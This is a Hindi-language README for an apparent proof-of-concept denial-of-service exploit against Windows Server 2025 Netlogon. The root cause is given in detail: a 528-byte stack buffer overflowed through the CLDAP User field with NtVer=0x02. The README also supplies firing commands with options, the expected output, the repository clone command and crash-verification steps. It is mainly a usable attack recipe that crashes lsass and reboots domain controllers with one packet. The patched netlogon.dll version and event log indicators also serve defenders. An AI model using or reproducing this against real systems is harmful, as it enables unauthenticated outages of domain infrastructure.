
CVE-2026-41089 LongLogon: अनपैच्ड Windows Server 2025 Netlogon (lsass 0xc0000409) के लिए pre-auth CLDAP (UDP/389) स्टैक बफ़र ओवरफ़्लो क्रैशर। केवल-स्ट्डलिब Python PoC + लैब राइट-अप।
Windows Server 2025 की Netlogon सेवा में प्री-ऑथेंटिकेशन स्टैक बफ़र ओवरफ़्लो। नेटवर्क पर किसी भी होस्ट से एक ही CLDAP पैकेट (UDP/389) पर्याप्त है: lsass.exe STATUS_STACK_BUFFER_OVERRUN (0xc0000409) के साथ मर जाता है और डोमेन कंट्रोलर रीबूट हो जाता है।
Netlogon CLDAP पिंग की प्रतिक्रिया 528-बाइट स्टैक बफ़र में सीरियलाइज़ की जाती है। सर्वर अपने स्वयं के नाम (फ़ॉरेस्ट, डोमेन, होस्टनेम) लिखता है और उसके बाद हमलावर-नियंत्रित User फ़ील्ड (130 वाइड अक्षरों तक सीमित) लिखता है। जब कुल भरण 536 बाइट्स (बफ़र + स्टैक कुकी) तक पहुँचता है, तो अनुगामी L'\0' /GS कुकी को ओवरराइट कर देता है और प्रोसेस क्रैश हो जाता है।
NtVer फ़ील्ड कोड पथ को निर्धारित करता है: 0x02 कमज़ोर BuildSamLogonResponse लेता है, जबकि 0x06 / 0x16 सीमित (सुरक्षित) BuildSamLogonResponseEx लेते हैं। यह PoC NtVer = 0x02 भेजता है।
python3 longlogon_exploit.py <dc-ip> <dc-dns-domain> [--dry-run] [--shots N] [--confirm-wait S] [--force]
--dry-run User=1 (बिनाइन) के साथ प्रोब करें, अनुमानित भरण दिखाएँ, फ़ायर न करें --shots N भेजे जाने वाले ओवरफ़्लो पैकेटों की संख्या (डिफ़ॉल्ट 1) --confirm-wait S साइलेंट शॉट के बाद पुनः-प्रोब करने से पहले प्रतीक्षा (डिफ़ॉल्ट 75s) --force अनुमानित भरण 536 बाइट्स से कम होने पर भी फ़ायर करें
उदाहरण (IP और डोमेन को अपने लैब मानों से बदलें):
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example --dry-run
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example
फ़ायर का अपेक्षित आउटपुट:
[*] CVE-2026-41089 LongLogon crasher -> 192.168.1.10 (domain 64 chars)
[*] DC alive. Probe fill (User=1) = 323 B; projected fill (User=130) = 581 B (buffer 528, cookie 536)
[*] Firing overflow: NtVer=0x02, User=130 chars, shots=1
shot #1: NO REPLY (5.01 s) -> possible crash (or lost packet)
[*] Waiting 75 s to let the DC (re)start, then re-probing...
[+] DC STILL DOWN after overflow + re-probe -> CRASH LIKELY (reboot in progress or dump pending)
एग्ज़िट कोड: 0 क्रैश संभावित, 1 प्रारंभिक प्रोब पर DC साइलेंट, 2 भरण 536 बाइट्स से कम (सीमा रेखा), 3 DC बच गया।
नोट: स्क्रिप्ट 75 सेकंड के बाद पुनः-प्रोब करती है क्योंकि एक साइलेंट पैकेट खोया हुआ UDP डेटाग्राम भी हो सकता है। केवल मौन से क्रैश का निष्कर्ष न निकालें।
रिसर्च रेपो से आधिकारिक चेकर का उपयोग करें। यह User=1 के साथ प्रोब करता है, इसलिए DC चालू रहता है:
git clone https://github.com/ADScanPro/CVE-2026-41089-LongLogon && cd CVE-2026-41089-LongLogon
python3 run longlogon.py <dc-ip> <dc-dns-domain>
अपेक्षित: "PRECONDITION MET" कम से कम 536 बाइट्स के अनुमानित भरण के साथ।
चेकर पैच स्थिति सिद्ध नहीं करता: एक पैच किया गया DC वही कोड पथ लेता है और बस अति-लंबे राइट को अस्वीकार कर देता है। DC पर सीधे netlogon.dll संस्करण जाँचें (< 10.0.26100.32772 = कमज़ोर)।
DC पर, इसके वापस चालू होने के बाद:
(Get-CimInstance Win32_OperatingSystem).LastBootUpTime
Get-WinEvent -FilterHashtable @{LogName='Application'; Id=1000} -MaxEvents 5
इवेंट 1000 देखें: faulting application lsass.exe, faulting module netlogon.DLL, exception code 0xc0000409, और शॉट के बाद का बूट समय।
Windows Server 2025, lsass.exe 10.0.26100.7309, netlogon.dll 10.0.26100.32230 (अनपैच्ड), 64-अक्षर डोमेन + 63-अक्षर होस्टनेम (अनुमानित भरण 581 बाइट्स) पर परीक्षण किया गया। एक पैकेट फ़ायर किया गया:
Application Error (Id 1000):
Faulting application: lsass.exe, version: 10.0.26100.7309
Faulting module: netlogon.DLL, version: 10.0.26100.32230
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)
Fault offset: 0x000000000002399d
LastBootUpTime: 17:19:42 (crash logged at 17:18:37)
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। इसे Windows Server 2025 पर एक पृथक लैब वातावरण में विकसित और परीक्षण किया गया था। इसका उपयोग अपने जोखिम पर करें।
इस स्क्रिप्ट का उपयोग करके आप सहमत हैं कि लेखक किसी भी डेटा हानि, सेवा व्यवधान, हार्डवेयर क्षति, या अन्य प्रत्यक्ष या अप्रत्यक्ष परिणामों के लिए उत्तरदायी नहीं है। क्रैश नॉन-आइडेम्पोटेंट है: लक्ष्य डोमेन कंट्रोलर रीबूट होगा। फ़ायर करने से पहले स्नैपशॉट लें।
कोई वारंटी नहीं दी जाती कि यह PoC उत्पादन वातावरण में या Windows Server 2025 के सभी बिल्डों पर काम करता है।